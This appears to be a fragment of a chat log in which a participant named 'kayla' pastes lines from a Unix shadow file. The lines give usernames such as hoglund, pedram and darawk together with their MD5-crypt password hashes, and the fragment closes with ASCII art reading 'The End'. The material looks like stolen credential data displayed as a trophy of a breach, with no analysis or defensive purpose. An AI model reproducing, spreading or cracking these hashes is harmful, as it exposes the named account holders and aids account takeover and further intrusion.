hoglund:$1$rfGprb5A$7hpSt9DW82ihOZEk3L3px.:15011:0:99999:7::: (08:03:14 PM) kayla: dateach:$1$LNORLcjK$IB1elonAPmGJLdwCOQoR0/:13225:0:99999:7::: (08:03:14 PM) kayla: pedram:$1$4oKzMX1n$IL36cXiKvnW4S8HpgmOS91:13208:0:99999:7::: (08:03:14 PM) kayla: darawk:$1$pDY/ltrQ$sGPmCZqOU509g36CwctkD/:13217:0:99999:7::: ooooooooooooo oooo oooooooooooo .o8 8' 888 `8 `888 `888' `8 "888 888 888 .oo. .ooooo. 888 ooo. .oo. .oooo888 888 888P"Y88b d88' `88b 888oooo8 `888P"Y88b d88' `888 888 888 888 888ooo888 888 " 888 888 888 888 888 888 888 888 .o 888 o 888 888 888 888 o888o o888o o888o `Y8bod8P' o888ooooood8 o888o o888o `Y8bod88P" ################################################################################################################################## ##################################################################################################################################